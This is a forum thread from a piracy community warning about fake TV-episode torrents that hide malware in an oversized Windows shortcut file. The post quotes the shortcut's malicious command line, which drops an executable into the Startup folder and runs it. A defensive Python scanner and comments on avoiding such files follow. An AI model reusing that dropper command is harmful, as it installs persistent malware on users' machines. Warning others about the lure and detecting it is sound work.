this post was submitted on 26 Feb 2025
92 points (100.0% liked)

Piracy: ꜱᴀɪʟ ᴛʜᴇ ʜɪɢʜ ꜱᴇᴀꜱ


I have Sonarr and Radarr set up to keep me up to date on some TV shows. Lately I've gotten a handful of files that Sonarr refuses to import because of a .lnk file. The download consists of a folder with the name of the file I want. Inside the folder is a file with the same name, and a .lnk extension. The .lnk file is very big (950Mb), and programmed to run this script:

%ComSpec% /v:On/CSET el=Severance.S02E07.1080p.WEB.H264-SuccessfulCrab.mkv&SET c="%Appdata%\microsoft\windows\START MENU\PROGRAMS\STARTUP%Username%.exe"&(If not exist !c! Findstr/v "cmd.EXE Rj%TIME:~7,1%%TIME:~-2%" !el!.Lnk>!c!&Start "" !c!)&CD %tmp%&Echo.>!

As far as I can tell, this creates an empty executable file in your Windows startup folder, and copies a portion of the fake video file into it. It then runs the malware. And, since it's in your startup folder, it will run again every time you reboot.

The tracker is theRARBG, but it could also come from elsewhere. I've found it on a couple of different shows (not just this one), and they always download a couple of days before the airdate.

Be careful!
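One way to screen a finished download for the kind of shortcut file described in the post, before anything is opened or imported (an added example, not part of the original post and not code from Sonarr or any torrent client). The function names, the 1 MiB size threshold and the media extension list are assumptions; the 20-byte header is the fixed start of the Windows Shell Link format.

```python
from pathlib import Path
import tempfile

# Every Windows Shell Link (.lnk) starts with HeaderSize 0x4C followed by
# the LinkCLSID 00021401-0000-0000-C000-000000000046.
LNK_MAGIC = bytes.fromhex("4c0000000114020000000000c000000000000046")
MAX_NORMAL_LNK = 1024 * 1024           # assumption: real shortcuts are a few KB
MEDIA_EXTS = {".mkv", ".mp4", ".avi"}  # assumption: adjust to your library

def inspect_file(path):
    """Return the reasons a file looks like a disguised or padded shortcut."""
    path = Path(path)
    suffixes = [s.lower() for s in path.suffixes]
    with path.open("rb") as fh:
        has_magic = fh.read(len(LNK_MAGIC)) == LNK_MAGIC
    named_lnk = path.suffix.lower() == ".lnk"
    reasons = []
    if named_lnk:
        reasons.append("lnk-extension")
        if len(suffixes) > 1 and suffixes[-2] in MEDIA_EXTS:
            reasons.append("media-name-with-lnk-suffix")
    elif has_magic:
        reasons.append("lnk-header-under-other-extension")
    if (named_lnk or has_magic) and path.stat().st_size > MAX_NORMAL_LNK:
        reasons.append("oversized-shortcut")
    return reasons

def scan_download(root):
    """Walk a download folder and map relative path -> list of reasons."""
    root = Path(root)
    findings = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            reasons = inspect_file(p)
            if reasons:
                findings[p.relative_to(root).as_posix()] = reasons
    return findings

def build_sample(root):
    """Constructed sample tree: padded fake shortcut, renamed one, clean file."""
    name = "Show.S01E01.1080p.WEB.mkv"
    folder = Path(root) / name
    folder.mkdir()
    (folder / (name + ".lnk")).write_bytes(LNK_MAGIC + b"\x00" * MAX_NORMAL_LNK)
    (Path(root) / "renamed.mkv").write_bytes(LNK_MAGIC + b"\x00" * 64)
    (Path(root) / "notes.txt").write_bytes(b"plain text")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, why in scan_download(tmp).items():
            print(rel, why)
```

Checking the header as well as the extension catches a shortcut that has been renamed to look like a video, which an extension-only exclusion rule would miss.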

top 10 comments

See these all the time, unfortunately. I just add a line in the torrent client to not download anything with that file extension.

[–] Comexs@lemmy.zip 29 points 1 day ago
[–] LiveLM@lemmy.zip 3 points 1 day ago* (last edited 1 day ago)

This is why I fear plugging public trackers into the arr stack.
Would be nice if Sonarr could ignore any torrents available before an episode's listed air date

[–] otto@sh.itjust.works 14 points 1 day ago

I’ve been noticing these around. Sonarr catches them and I just delete them and research. I found that it’s often for the next week’s episode of a show. Only days after the previous episode came out. So it’s easy to see something that looks suspect anyway.

[–] Biskii@lemmy.dbzer0.com 10 points 1 day ago

Thank you for the heads up!

[–] AmbiguousProps@lemmy.today 6 points 1 day ago

I luckily haven't encountered these yet, but I primarily use NZB

[–] tabel2@lemmy.wtf 4 points 1 day ago

If there is one that is smaller than 950MB, it would be interesting if you uploaded it to a cloud sandbox analyzer like Any.Run, Triage, or some other similar service.

[–] piccolo@sh.itjust.works 3 points 1 day ago (2 children)
[–] fubbernuckin@lemmy.dbzer0.com 12 points 1 day ago

You laugh in Linux now, but just wait until the year of the Linux desktop comes. Every malware developer on earth will be knocking on our door.

[–] Berstrrs@lemmy.dbzer0.com -1 points 1 day ago

I only laugh in Linux cause it's just the same analogy as driving a Dodge Ram in Europe - good luck finding spare parts.

At the same time VW Golf parts are sold almost in every convenience store.